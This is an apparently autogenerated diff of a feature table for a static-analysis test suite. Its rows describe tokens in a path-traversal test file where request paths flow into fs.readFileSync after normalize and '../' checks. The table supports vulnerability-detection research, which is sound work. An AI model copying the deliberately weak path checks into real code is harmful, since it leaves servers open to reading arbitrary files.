app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:61 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | exceptional return of pathMod ... aceDir) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | exceptional return of pathMod ... aceDir) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | exceptional return of pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | exceptional return of pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | CalleeFlexibleAccessPath | pathModule.relative | | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | calleeImports | path | @@ -9087,6 +76877,11 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:276:42:276:75 | pathMod ... aceDir) | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:276:53:276:61 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:276:53:276:61 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:276:53:276:61 | normalize | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:276:53:276:61 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:276:53:276:61 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:276:63:276:74 | workspaceDir | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:276:63:276:74 | workspaceDir | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:276:63:276:74 | workspaceDir | calleeImports | path | @@ -9105,6 +76900,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:276:78:276:84 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:276:78:276:84 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:276:78:276:84 | newpath | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | exceptional return of relativ ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | exceptional return of relativ ... ('../') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | exceptional return of relativ ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | exceptional return of relativ ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | exceptional return of relativ ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | relativ ... ('../') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | relativ ... ('../') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | relativ ... ('../') | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | relativ ... ('../') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:33 | relativ ... ('../') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:39 | relativ ... ) === 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:39 | relativ ... ) === 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:39 | relativ ... ) === 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:39 | relativ ... ) === 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:7:277:39 | relativ ... ) === 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:277:20:277:26 | indexOf | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:20:277:26 | indexOf | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:277:20:277:26 | indexOf | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:20:277:26 | indexOf | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:20:277:26 | indexOf | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | CalleeFlexibleAccessPath | relativePath.indexOf | | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | calleeImports | path | @@ -9114,6 +76934,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:277:28:277:32 | '../' | receiverName | relativePath | +| autogenerated/TaintedPath/normalizedPaths.js:277:39:277:39 | 0 | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:277:39:277:39 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:277:39:277:39 | 0 | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:277:39:277:39 | 0 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:277:39:277:39 | 0 | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:278:5:278:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:278:8:278:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:278:8:278:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:278:8:278:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:278:8:278:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:278:8:278:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | calleeImports | fs | @@ -9123,6 +76973,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:278:21:278:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:6 | fs | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | exceptional return of fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | exceptional return of fs.read ... ewpath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | exceptional return of fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | exceptional return of fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | fs.read ... ewpath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | fs.read ... ewpath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | fs.read ... ewpath) | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | fs.read ... ewpath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:280:5:280:28 | fs.read ... ewpath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:280:8:280:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:280:8:280:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:280:8:280:19 | readFileSync | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ fs readFileSync newpath fs readFileSync newpath | +| autogenerated/TaintedPath/normalizedPaths.js:280:8:280:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:280:8:280:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | calleeImports | fs | @@ -9132,6 +77007,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:280:21:280:27 | newpath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:13 | newpath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:13 | newpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:283:7:283:13 | newpath | enclosingFunctionBody | req res path pathModule resolve req query path fs readFileSync path self something relative pathModule relative self webroot path relative startsWith .. pathModule sep relative .. fs readFileSync path fs readFileSync path newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf .. pathModule sep 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize workspaceDir newpath pathModule normalize relativePath indexOf ../ 0 fs readFileSync newpath fs readFileSync newpath newpath pathModule normalize path relativePath pathModule relative pathModule normalize 